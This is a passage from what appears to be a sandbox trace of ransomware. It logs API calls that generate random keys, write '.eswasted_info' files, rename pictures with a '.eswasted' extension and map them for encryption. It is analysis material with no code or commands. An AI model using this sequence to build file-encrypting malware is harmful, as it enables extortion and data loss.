HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\anikb6gG7bb0Y7wvRNp.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\anikb6gg7bb0y7wvrnp.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0081.003] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0081.004] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0081.005] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4f00b8 | out: pbBuffer=0x4f00b8) returned 1 [0081.005] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.005] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0081.006] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0081.006] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.049] SetEndOfFile (hFile=0xfc) returned 1 [0081.051] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.051] CloseHandle (hObject=0xfc) returned 1 [0081.052] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef6d0 | out: hHeap=0x4a0000) returned 1 [0081.053] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0081.053] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0081.053] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.053] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\GyaFVFmx.jpg") returned 101 [0081.053] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2d4) returned 0x4efe18 [0081.054] lstrcpyW (in: lpString1=0x4efee2, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.054] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.054] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0081.054] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.054] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.054] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\GyaFVFmx.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\gyafvfmx.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0081.055] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.056] SetEndOfFile (hFile=0xfc) returned 1 [0081.056] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.056] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.056] lstrcpyW (in: lpString1=0x4efee2, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.056] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\GyaFVFmx.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\gyafvfmx.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\GyaFVFmx.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\gyafvfmx.jpg.eswasted")) returned 1 [0081.057] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\GyaFVFmx.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\gyafvfmx.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0081.057] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0081.058] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0081.059] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef488 | out: pbBuffer=0x4ef488) returned 1 [0081.059] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.059] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0081.060] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0081.060] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.068] SetEndOfFile (hFile=0xfc) returned 1 [0081.070] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.070] CloseHandle (hObject=0xfc) returned 1 [0081.072] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4efe18 | out: hHeap=0x4a0000) returned 1 [0081.072] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0081.073] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0081.073] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.073] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\KvlEErEIAUg.gif") returned 104 [0081.073] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2da) returned 0x4efe18 [0081.074] lstrcpyW (in: lpString1=0x4efee8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.074] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.074] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0081.075] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.075] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.075] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\KvlEErEIAUg.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\kvleereiaug.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0081.075] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.077] SetEndOfFile (hFile=0xfc) returned 1 [0081.077] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.077] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.077] lstrcpyW (in: lpString1=0x4efee8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.077] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\KvlEErEIAUg.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\kvleereiaug.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\KvlEErEIAUg.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\kvleereiaug.gif.eswasted")) returned 1 [0081.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\KvlEErEIAUg.gif.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\kvleereiaug.gif.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0081.078] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0081.080] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0081.081] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef488 | out: pbBuffer=0x4ef488) returned 1 [0081.081] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.081] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0081.082] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0081.082] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.140] SetEndOfFile (hFile=0xfc) returned 1 [0081.142] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.142] CloseHandle (hObject=0xfc) returned 1 [0081.145] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4efe18 | out: hHeap=0x4a0000) returned 1 [0081.145] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0081.146] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0081.146] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.146] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\DitdskdCXI6IkD5T9.jpg") returned 123 [0081.146] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x300) returned 0x4d91a8 [0081.146] lstrcpyW (in: lpString1=0x4d929e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.146] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.146] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0081.147] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.147] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.147] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\DitdskdCXI6IkD5T9.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\ditdskdcxi6ikd5t9.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0081.148] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.149] SetEndOfFile (hFile=0xfc) returned 1 [0081.149] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.149] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.149] lstrcpyW (in: lpString1=0x4d929e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.149] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\DitdskdCXI6IkD5T9.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\ditdskdcxi6ikd5t9.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\DitdskdCXI6IkD5T9.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\ditdskdcxi6ikd5t9.jpg.eswasted")) returned 1 [0081.150] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\DitdskdCXI6IkD5T9.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\ditdskdcxi6ikd5t9.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0081.150] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x118 [0081.153] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0081.154] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ef488 | out: pbBuffer=0x4ef488) returned 1 [0081.154] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.154] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0081.155] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0081.155] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.166] SetEndOfFile (hFile=0xfc) returned 1 [0081.169] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.169] CloseHandle (hObject=0xfc) returned 1 [0081.235] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0081.235] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0081.236] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0081.236] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.236] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\K86V.jpg") returned 110 [0081.236] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2e6) returned 0x4ef648 [0081.236] lstrcpyW (in: lpString1=0x4ef724, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.236] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.236] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0081.237] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.237] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\K86V.jpg.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\k86v.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0081.238] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.239] SetEndOfFile (hFile=0xfc) returned 1 [0081.240] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.240] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.240] lstrcpyW (in: lpString1=0x4ef724, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.240] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\K86V.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\k86v.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\K86V.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\k86v.jpg.eswasted")) returned 1 [0081.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\K86V.jpg.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\k86v.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0081.241] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0081.242] CryptAcquireContextW (in: phProv=0x111fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fdc4*=0x4e5ff0) returned 1 [0081.243] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0081.243] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.243] CryptAcquireContextW (in: phProv=0x111fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fb2c*=0x4e5ff0) returned 1 [0081.244] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x111fb48 | out: pbBuffer=0x111fb48) returned 1 [0081.244] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.254] SetEndOfFile (hFile=0xfc) returned 1 [0081.257] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.257] CloseHandle (hObject=0xfc) returned 1 [0081.259] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef648 | out: hHeap=0x4a0000) returned 1 [0081.259] CryptAcquireContextW (in: phProv=0x111fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fe0c*=0x4e5ff0) returned 1 [0081.260] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x111fe48 | out: pbBuffer=0x111fe48) returned 1 [0081.260] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.260] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\Kv0KEma.gif") returned 113 [0081.260] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x2ec) returned 0x4ef648 [0081.260] lstrcpyW (in: lpString1=0x4ef72a, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.260] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.260] CryptAcquireContextW (in: phProv=0x111fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x111fde8*=0x4e5ff0) returned 1 [0081.261] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.261] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.261] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\Kv0KEma.gif.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\kv0kema.gif.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0081.262] WriteFile (in: hFile=0xfc, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x111fe04, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x111fe04*=0xa46, lpOverlapped=0x0) returned 1 [0081.264] SetEndOfFile (hFile=0xfc) returned 1 [0081.264] SetFilePointer (in: hFile=0xfc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.264] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.264] lstrcpyW (in: lpString1=0x4ef72a, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.264] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\Kv0KEma.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\zqcd1pt\\xnr6beelebb\\zr-guqe-ogahp2biq\\bjarmd2\\qryxslah0npg\\kv0kema.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\ZQCd1PT\\xnR6BEeLEBB\\zR-GUQe-OgaHp2BiQ\\bjArMd2\\qRyXslAH0NPG\\Kv0KEma.gif.eswasted" (normalized: 